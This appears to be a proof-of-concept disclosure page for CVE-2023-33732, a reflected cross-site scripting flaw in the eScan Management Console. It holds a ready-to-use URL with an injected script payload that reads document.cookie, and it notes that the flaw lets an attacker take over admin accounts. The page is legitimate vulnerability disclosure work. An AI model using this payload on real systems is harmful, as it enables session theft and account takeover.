CVE-2023-33732 PoC — Microworld Technologies eScan Management Console 跨站脚本漏洞

Source

Associated Vulnerability

Readme

## eScan Management Console 14.0.1400.2281 - Reflected Cross Site Scripting ###

**Description:**
Cross Site Scripting (XSS) in the New Policy form in Microworld Technologies eScan management console 14.0.1400.2281 allows a remote attacker to inject arbitrary code via the vulnerable parameters type, txtPolicyType, and Deletefileval.

**Vulnerable Product Version:**
14.0.1400.2281

**Date:**
30/05/2023

**CVE:** 
CVE-2023-33732

**CVE Author:**
Sahil Ojha

**Vendor Homepage:**
https://www.escanav.com

**Software Link:** 
https://cl.escanav.com/ewconsole.dll

**Tested on:** 
Windows

**Steps to reproduce:**
1. Login into the eScan Management Console with a valid user credential.
2. Navigate to URL: https://cl.escanav.com/ewconsole/ewconsole.dll/AssignPolicyTemplate?type=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&edit=0&txtPolicyType=&txtPolicyPath=!!!!%24%5CPolicies&Deletefileval=Roaming%20Users_Policy2&defaultpolicy=1
3. After browsing the above mentioned URL, a XSS alert popped up with user session cookie as shown in figure below. Other vulnerable paramater's in the above URL are Type, txtPolicyPath, Deletefileval.
![HTML Render](https://github.com/sahiloj/CVE-2023-33733/blob/main/1.png)
![HTML Render](https://github.com/sahiloj/CVE-2023-33733/blob/main/2.png)
4. By exploiting this vulnerability, any arbitrary attacker could have stolen an admin user session cookie to perform account takeover.
![HTML Render](https://github.com/sahiloj/CVE-2023-33733/blob/main/3.png)
 

File Snapshot

 [4.0K]  /data/pocs/a7a3c49c4d227cccfd1630127035d4b6dfe1e17e
├── [ 13K]  1.png
├── [ 27K]  2.png
├── [ 63K]  3.png
├── [1.5K]  CVE-2023-33732.md
└── [1.5K]  README.md

0 directories, 5 files

Remarks